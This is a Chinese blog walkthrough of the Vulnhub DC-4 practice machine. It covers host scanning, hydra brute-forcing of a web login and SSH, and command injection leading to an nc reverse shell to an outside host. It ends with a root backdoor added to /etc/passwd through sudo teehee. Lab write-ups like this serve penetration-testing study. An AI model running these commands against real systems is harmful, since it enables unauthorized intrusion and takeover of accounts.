Vulnhub靶机 DC-4

本文通过一系列命令展示如何进行信息收集、端口扫描、登录爆破、命令执行等渗透测试操作,最终获取目标系统的权限。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

信息收集

在这里插入图片描述
`arp-scan -l 扫描本地

nmap -sV 192.168.0.132 扫描靶机开放端口`

开放80端口,访问一下页面

在这里插入图片描述

是个登录页面,而且可以用爆破来登录,没有验证机制

在这里插入图片描述
安装pydictor,一个字典生成工具,用它生成一个用户名字典

 git clone --depth=1 --branch=master https://www.github.com/landgrey/pydictor.git
cd pydictor/
chmod +x pydictor.py
python pydictor.py
python pydictor.py --len 3 6 -base dLc -o /Desktop/usr.txt


再用crew生成一个密码字典

cewl 192.168.0.132 -w /Desktop/pw.txt

进行爆破

hydra -L user.txt -P pw.txt 192.168.0.132 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -F

账号:admin
密码:happy

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述在这里插入图片描述在这里插入图片描述

用burpsuite抓一下包,发现可以用ls命令,查询了一下文件
既然能执行命令,那不如直接执行nc
连接成功
上python脚本

nc -e /bin/sh 192.168.248.130 4444
python -c 'import pty;pty.spawn("/bin/bash")'


刚才看见jim文件夹下,有个backups,里面有一个旧字典,扒下来,留着爆破ssh
在这里插入图片描述

成功获得jim的密码

hydra -L 【用户名字典】 -P 【密码字典】 192.168.0.132 ssh -t 20

在这里插入图片描述

ssh jim@192.168.0.132

刚才不是有个mbox,看看有什么

在这里插入图片描述在这里插入图片描述

得到了charles的密码,登录进去

在这里插入图片描述
在这里插入图片描述
teehee命令可以写入文件内容并不覆盖文件原有内容
写入root用户
查找flag
完成

echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值